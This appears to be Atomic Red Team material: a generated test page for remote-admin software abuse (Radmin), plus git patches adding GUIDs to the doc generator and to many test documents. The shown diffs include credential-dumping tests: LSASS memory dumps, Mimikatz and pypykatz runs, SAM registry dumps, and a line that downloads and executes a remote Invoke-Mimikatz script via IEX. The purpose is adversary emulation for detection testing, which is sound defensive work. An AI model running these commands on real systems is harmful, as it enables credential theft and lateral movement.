Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). + +Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. + +The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.
+ +## Atomic Tests + +- [Atomic Test #1 - Radmin Viewer Utility](#atomic-test-1---radmin-viewer-utility) + + +
+ +## Atomic Test #1 - Radmin Viewer Utility +An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| radmin_installer | Radmin Viewer installer | Path | %TEMP%\RadminViewer.msi| +| radmin_exe | The radmin.exe executable from RadminViewer.msi | Path | %PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +"#{radmin_exe}" +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) +##### Check Prereq Commands: +```cmd +if not exist "#{radmin_exe}" (exit /b 1) +``` +##### Get Prereq Commands: +```cmd +echo Downloading radmin installer +bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} +msiexec /i "#{radmin_installer}" /qn +``` + + + + +
From 221f3a60270d19b33cc8fa2cb476f6226322fa6f Mon Sep 17 00:00:00 2001 From: Jose Enrique Hernandez Date: Thu, 24 Jun 2021 11:16:09 -0400 Subject: [PATCH 63/84] adding auto generated guids to the md files, closes issue 1501 (#1529) --- atomic_red_team/atomic_doc_template.md.erb | 8 +++++--- bin/generate-atomic-docs.rb | 15 +++++++-------- 2 files changed, 12 insertions(+), 11 deletions(-) diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb index dd71601b..62a77d6f 100644 --- a/atomic_red_team/atomic_doc_template.md.erb +++ b/atomic_red_team/atomic_doc_template.md.erb @@ -13,8 +13,10 @@
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %> -<%= test['description'].strip -%> +auto_generated_guid: <%= test['auto_generated_guid'] %> + +<%= test['description'].strip -%> **Supported Platforms:** <%= test['supported_platforms'].collect do |p| case p @@ -31,7 +33,7 @@ end%> <% if test['input_arguments'].to_a.count > 0 %> #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| <% test['input_arguments'].each do |arg_name, arg_options| -%> | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>| @@ -75,7 +77,7 @@ end%> ##### Description: <%= dep['description'].strip %> ##### Check Prereq Commands: ```<%= get_language(dependency_executor) %> -<%= dep['prereq_command'].strip %> +<%= dep['prereq_command'].strip %> ``` ##### Get Prereq Commands: ```<%= get_language(dependency_executor) %> diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb index 83ee3678..f396d563 100755 --- a/bin/generate-atomic-docs.rb +++ b/bin/generate-atomic-docs.rb @@ -63,7 +63,6 @@ class AtomicRedTeamDocs def generate_technique_docs!(atomic_yaml, output_doc_path) technique = ATTACK_API.technique_info(atomic_yaml.fetch('attack_technique')) technique['identifier'] = atomic_yaml.fetch('attack_technique').upcase - template = ERB.new File.read("#{ATOMIC_RED_TEAM_DIR}/atomic_doc_template.md.erb"), nil, "-" generated_doc = template.result(binding) @@ -135,7 +134,7 @@ class AtomicRedTeamDocs puts "Generated Atomic Red Team index at #{output_doc_path}" end - + # # Generates a master Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests # @@ -231,16 +230,16 @@ class AtomicRedTeamDocs if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end end - if has_windows_tests then - techniques_win.push(technique) + if has_windows_tests then + techniques_win.push(technique) techniques_win.push(techniqueParent) unless techniques_win.include?(techniqueParent) end - if has_macos_tests then - techniques_mac.push(technique) + if has_macos_tests then + techniques_mac.push(technique) techniques_mac.push(techniqueParent) unless techniques_mac.include?(techniqueParent) end - if has_linux_tests then - techniques_lin.push(technique) + if has_linux_tests then + techniques_lin.push(technique) techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent) end end From 575b36a8e62a5642a6bc6722b53bf465dc7e177c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 15:16:54 +0000 Subject: [PATCH 64/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.md | 86 ++++++++++++++-------- atomics/T1003.002/T1003.002.md | 24 ++++--- atomics/T1003.003/T1003.003.md | 48 ++++++++----- atomics/T1003.004/T1003.004.md | 8 ++- atomics/T1003.006/T1003.006.md | 8 ++- atomics/T1003.007/T1003.007.md | 18 +++-- atomics/T1003.008/T1003.008.md | 12 ++-- atomics/T1003/T1003.md | 14 ++-- atomics/T1006/T1006.md | 6 +- atomics/T1007/T1007.md | 10 ++- atomics/T1010/T1010.md | 8 ++- atomics/T1012/T1012.md | 4 +- atomics/T1014/T1014.md | 24 ++++--- atomics/T1016/T1016.md | 42 +++++++---- atomics/T1018/T1018.md | 66 +++++++++++------ atomics/T1020/T1020.md | 6 +- atomics/T1021.001/T1021.001.md | 14 ++-- atomics/T1021.002/T1021.002.md | 26 ++++--- atomics/T1021.003/T1021.003.md | 6 +- atomics/T1021.006/T1021.006.md | 20 ++++-- atomics/T1027.001/T1027.001.md | 8 ++- atomics/T1027.002/T1027.002.md | 24 ++++--- atomics/T1027.004/T1027.004.md | 16 +++-- atomics/T1027/T1027.md | 36 ++++++---- atomics/T1030/T1030.md | 8 ++- atomics/T1033/T1033.md | 14 ++-- atomics/T1036.003/T1036.003.md | 44 ++++++++---- atomics/T1036.004/T1036.004.md | 8 ++- atomics/T1036.005/T1036.005.md | 6 +- atomics/T1036.006/T1036.006.md | 4 +- atomics/T1036/T1036.md | 4 +- atomics/T1037.001/T1037.001.md | 6 +- atomics/T1037.002/T1037.002.md | 4 +- atomics/T1037.004/T1037.004.md | 12 +++- atomics/T1037.005/T1037.005.md | 4 +- atomics/T1040/T1040.md | 30 +++++--- atomics/T1046/T1046.md | 28 +++++--- atomics/T1047/T1047.md | 40 +++++++---- atomics/T1048.003/T1048.003.md | 26 ++++--- atomics/T1048/T1048.md | 12 ++-- atomics/T1049/T1049.md | 22 ++++-- atomics/T1053.001/T1053.001.md | 10 +-- atomics/T1053.002/T1053.002.md | 4 +- atomics/T1053.003/T1053.003.md | 18 +++-- atomics/T1053.004/T1053.004.md | 6 +- atomics/T1053.005/T1053.005.md | 32 ++++++--- atomics/T1053.006/T1053.006.md | 6 +- atomics/T1053.007/T1053.007.md | 12 ++-- atomics/T1055.001/T1055.001.md | 8 ++- atomics/T1055.004/T1055.004.md | 6 +- atomics/T1055.012/T1055.012.md | 14 ++-- atomics/T1055/T1055.md | 16 +++-- atomics/T1056.001/T1056.001.md | 10 ++- atomics/T1056.002/T1056.002.md | 8 ++- atomics/T1056.004/T1056.004.md | 8 ++- atomics/T1057/T1057.md | 10 ++- atomics/T1059.001/T1059.001.md | 110 ++++++++++++++++++---------- atomics/T1059.002/T1059.002.md | 4 +- atomics/T1059.003/T1059.003.md | 14 ++-- atomics/T1059.004/T1059.004.md | 10 ++- atomics/T1059.005/T1059.005.md | 22 +++--- atomics/T1059.006/T1059.006.md | 24 ++++--- atomics/T1069.001/T1069.001.md | 12 +++- atomics/T1069.002/T1069.002.md | 44 ++++++++---- atomics/T1070.001/T1070.001.md | 16 +++-- atomics/T1070.002/T1070.002.md | 16 +++-- atomics/T1070.003/T1070.003.md | 46 ++++++++---- atomics/T1070.004/T1070.004.md | 66 +++++++++++------ atomics/T1070.005/T1070.005.md | 18 +++-- atomics/T1070.006/T1070.006.md | 58 +++++++++------ atomics/T1070/T1070.md | 4 +- atomics/T1071.001/T1071.001.md | 20 ++++-- atomics/T1071.004/T1071.004.md | 24 ++++--- atomics/T1072/T1072.md | 8 ++- atomics/T1074.001/T1074.001.md | 18 +++-- atomics/T1078.001/T1078.001.md | 6 +- atomics/T1078.003/T1078.003.md | 4 +- atomics/T1082/T1082.md | 48 +++++++++---- atomics/T1083/T1083.md | 20 ++++-- atomics/T1087.001/T1087.001.md | 54 +++++++++----- atomics/T1087.002/T1087.002.md | 66 +++++++++++------ atomics/T1090.001/T1090.001.md | 18 +++-- atomics/T1095/T1095.md | 20 ++++-- atomics/T1098.004/T1098.004.md | 4 +- atomics/T1098/T1098.md | 12 ++-- atomics/T1105/T1105.md | 86 ++++++++++++++-------- atomics/T1106/T1106.md | 6 +- atomics/T1110.001/T1110.001.md | 12 ++-- atomics/T1110.002/T1110.002.md | 8 ++- atomics/T1110.003/T1110.003.md | 20 ++++-- atomics/T1110.004/T1110.004.md | 16 +++-- atomics/T1112/T1112.md | 30 +++++--- atomics/T1113/T1113.md | 34 +++++---- atomics/T1114.001/T1114.001.md | 8 ++- atomics/T1115/T1115.md | 20 ++++-- atomics/T1119/T1119.md | 16 +++-- atomics/T1120/T1120.md | 4 +- atomics/T1123/T1123.md | 4 +- atomics/T1124/T1124.md | 10 ++- atomics/T1127.001/T1127.001.md | 16 +++-- atomics/T1132.001/T1132.001.md | 6 +- atomics/T1133/T1133.md | 8 ++- atomics/T1134.001/T1134.001.md | 8 ++- atomics/T1134.004/T1134.004.md | 40 +++++++---- atomics/T1135/T1135.md | 32 ++++++--- atomics/T1136.001/T1136.001.md | 36 ++++++---- atomics/T1136.002/T1136.002.md | 18 +++-- atomics/T1137.002/T1137.002.md | 6 +- atomics/T1137.004/T1137.004.md | 6 +- atomics/T1137/T1137.md | 4 +- atomics/T1140/T1140.md | 12 ++-- atomics/T1176/T1176.md | 16 +++-- atomics/T1197/T1197.md | 24 ++++--- atomics/T1201/T1201.md | 32 ++++++--- atomics/T1202/T1202.md | 18 +++-- atomics/T1204.002/T1204.002.md | 60 ++++++++++------ atomics/T1207/T1207.md | 10 +-- atomics/T1216.001/T1216.001.md | 6 +- atomics/T1216/T1216.md | 12 ++-- atomics/T1217/T1217.md | 34 ++++++--- atomics/T1218.001/T1218.001.md | 54 ++++++++------ atomics/T1218.002/T1218.002.md | 8 ++- atomics/T1218.003/T1218.003.md | 16 +++-- atomics/T1218.004/T1218.004.md | 64 ++++++++++------- atomics/T1218.005/T1218.005.md | 64 +++++++++++------ atomics/T1218.007/T1218.007.md | 22 +++--- atomics/T1218.008/T1218.008.md | 8 ++- atomics/T1218.009/T1218.009.md | 16 +++-- atomics/T1218.010/T1218.010.md | 38 ++++++---- atomics/T1218.011/T1218.011.md | 54 +++++++++----- atomics/T1218/T1218.md | 62 ++++++++++------ atomics/T1219/T1219.md | 12 +++- atomics/T1220/T1220.md | 30 +++++--- atomics/T1221/T1221.md | 8 ++- atomics/T1222.001/T1222.001.md | 40 +++++++---- atomics/T1222.002/T1222.002.md | 54 +++++++++----- atomics/T1482/T1482.md | 34 +++++---- atomics/T1485/T1485.md | 14 ++-- atomics/T1486/T1486.md | 32 +++++---- atomics/T1489/T1489.md | 18 +++-- atomics/T1490/T1490.md | 30 +++++--- atomics/T1491.001/T1491.001.md | 6 +- atomics/T1496/T1496.md | 4 +- atomics/T1497.001/T1497.001.md | 12 +++- atomics/T1505.002/T1505.002.md | 8 ++- atomics/T1505.003/T1505.003.md | 8 ++- atomics/T1518.001/T1518.001.md | 24 +++++-- atomics/T1518/T1518.md | 12 +++- atomics/T1529/T1529.md | 44 ++++++++---- atomics/T1531/T1531.md | 20 ++++-- atomics/T1543.001/T1543.001.md | 8 ++- atomics/T1543.002/T1543.002.md | 12 ++-- atomics/T1543.003/T1543.003.md | 20 ++++-- atomics/T1543.004/T1543.004.md | 8 ++- atomics/T1546.001/T1546.001.md | 6 +- atomics/T1546.002/T1546.002.md | 6 +- atomics/T1546.003/T1546.003.md | 4 +- atomics/T1546.004/T1546.004.md | 12 ++-- atomics/T1546.005/T1546.005.md | 4 +- atomics/T1546.007/T1546.007.md | 6 +- atomics/T1546.008/T1546.008.md | 10 ++- atomics/T1546.010/T1546.010.md | 10 +-- atomics/T1546.011/T1546.011.md | 18 +++-- atomics/T1546.012/T1546.012.md | 12 ++-- atomics/T1546.013/T1546.013.md | 8 ++- atomics/T1546.014/T1546.014.md | 6 +- atomics/T1547.001/T1547.001.md | 34 ++++++--- atomics/T1547.004/T1547.004.md | 18 +++-- atomics/T1547.005/T1547.005.md | 6 +- atomics/T1547.006/T1547.006.md | 8 ++- atomics/T1547.007/T1547.007.md | 10 ++- atomics/T1547.009/T1547.009.md | 10 ++- atomics/T1547.010/T1547.010.md | 6 +- atomics/T1547.011/T1547.011.md | 4 +- atomics/T1548.001/T1548.001.md | 18 +++-- atomics/T1548.002/T1548.002.md | 52 +++++++++----- atomics/T1548.003/T1548.003.md | 12 +++- atomics/T1550.002/T1550.002.md | 16 +++-- atomics/T1550.003/T1550.003.md | 8 ++- atomics/T1552.001/T1552.001.md | 22 ++++-- atomics/T1552.002/T1552.002.md | 8 ++- atomics/T1552.003/T1552.003.md | 6 +- atomics/T1552.004/T1552.004.md | 22 ++++-- atomics/T1552.006/T1552.006.md | 16 +++-- atomics/T1552.007/T1552.007.md | 22 +++--- atomics/T1553.001/T1553.001.md | 6 +- atomics/T1553.004/T1553.004.md | 38 ++++++---- atomics/T1553.005/T1553.005.md | 16 +++-- atomics/T1555.001/T1555.001.md | 6 +- atomics/T1555.003/T1555.003.md | 22 +++--- atomics/T1555/T1555.md | 14 ++-- atomics/T1556.002/T1556.002.md | 8 ++- atomics/T1558.001/T1558.001.md | 8 ++- atomics/T1558.003/T1558.003.md | 4 +- atomics/T1559.002/T1559.002.md | 12 +++- atomics/T1560.001/T1560.001.md | 62 ++++++++++------ atomics/T1560.002/T1560.002.md | 32 +++++---- atomics/T1560/T1560.md | 6 +- atomics/T1562.001/T1562.001.md | 128 ++++++++++++++++++++++----------- atomics/T1562.002/T1562.002.md | 18 +++-- atomics/T1562.003/T1562.003.md | 10 ++- atomics/T1562.004/T1562.004.md | 34 ++++++--- atomics/T1562.006/T1562.006.md | 12 ++-- atomics/T1563.002/T1563.002.md | 6 +- atomics/T1564.001/T1564.001.md | 38 ++++++---- atomics/T1564.002/T1564.002.md | 12 ++-- atomics/T1564.003/T1564.003.md | 6 +- atomics/T1564.004/T1564.004.md | 26 ++++--- atomics/T1564/T1564.md | 14 ++-- atomics/T1566.001/T1566.001.md | 12 ++-- atomics/T1569.001/T1569.001.md | 6 +- atomics/T1569.002/T1569.002.md | 14 ++-- atomics/T1571/T1571.md | 12 ++-- atomics/T1573/T1573.md | 6 +- atomics/T1574.001/T1574.001.md | 4 +- atomics/T1574.002/T1574.002.md | 8 ++- atomics/T1574.006/T1574.006.md | 16 +++-- atomics/T1574.009/T1574.009.md | 6 +- atomics/T1574.011/T1574.011.md | 14 ++-- atomics/T1574.012/T1574.012.md | 24 ++++--- atomics/T1609/T1609.md | 6 +- atomics/T1610/T1610.md | 14 ++-- atomics/T1611/T1611.md | 14 ++-- 223 files changed, 2923 insertions(+), 1473 deletions(-) diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 94a97982..9869cc02 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -54,6 +54,9 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor + +auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. @@ -61,14 +64,13 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt| | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933| @@ -94,7 +96,7 @@ del "#{output_file}" >nul 2>&1 ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{wce_exe}) {exit 0} else {exit 1} +if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -115,20 +117,22 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump + +auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| @@ -152,7 +156,7 @@ del "#{output_file}" >nul 2> nul ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -170,10 +174,12 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll + +auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. - **Supported Platforms:** Windows @@ -200,20 +206,22 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking + +auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe| @@ -236,7 +244,7 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} +if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -252,9 +260,11 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager + +auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. - **Supported Platforms:** Windows @@ -282,16 +292,18 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz + +auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 + The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003.001\bin\mimikatz.exe| @@ -311,7 +323,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} +if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -332,7 +344,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ##### Description: Lsass dump must exist at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -cmd /c "if not exist #{input_file} (exit /b 1)" +cmd /c "if not exist #{input_file} (exit /b 1)" ``` ##### Get Prereq Commands: ```powershell @@ -346,12 +358,14 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz + +auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 + Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. - **Supported Platforms:** Windows @@ -373,7 +387,7 @@ pypykatz live lsa ##### Check Prereq Commands: ```cmd py -3 --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -383,7 +397,7 @@ echo "Python 3 must be installed manually" ##### Check Prereq Commands: ```cmd py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -393,7 +407,7 @@ echo "PIP must be installed manually" ##### Check Prereq Commands: ```cmd pypykatz -h >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -407,10 +421,12 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 + +auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 + The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. - **Supported Platforms:** Windows @@ -438,20 +454,22 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump + +auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| @@ -475,7 +493,7 @@ del "#{output_file}" >nul 2> nul ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -492,18 +510,20 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz + +auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| @@ -524,16 +544,18 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe + +auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp| | createdump_exe | Path of createdump.exe executable | Path | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe| @@ -561,7 +583,7 @@ del #{output_file} ##### Description: Computer must have createdump.exe from .Net 5 ##### Check Prereq Commands: ```powershell -if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} +if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -575,19 +597,21 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs + +auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| @@ -611,7 +635,7 @@ Remove-Item ${output_file} -ErrorAction Ignore ##### Description: Computer must have xordump.exe ##### Check Prereq Commands: ```powershell -if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 1516c1da..73f20f13 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -36,11 +36,13 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets + +auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. - **Supported Platforms:** Windows @@ -71,8 +73,10 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz -Parses registry hives to obtain stored credentials +auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + +Parses registry hives to obtain stored credentials **Supported Platforms:** Windows @@ -94,7 +98,7 @@ pypykatz live registry ##### Check Prereq Commands: ```cmd py -3 --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -104,7 +108,7 @@ echo "Python 3 must be installed manually" ##### Check Prereq Commands: ```cmd py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -114,7 +118,7 @@ echo "PIP must be installed manually" ##### Check Prereq Commands: ```cmd pypykatz -h >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -128,16 +132,18 @@ pip install pypykatz
## Atomic Test #3 - esentutl.exe SAM copy + +auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 + Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM| | file_name | Name of the copied file | String | SAM| @@ -164,8 +170,10 @@ del #{copy_dest}\#{file_name} >nul 2>&1
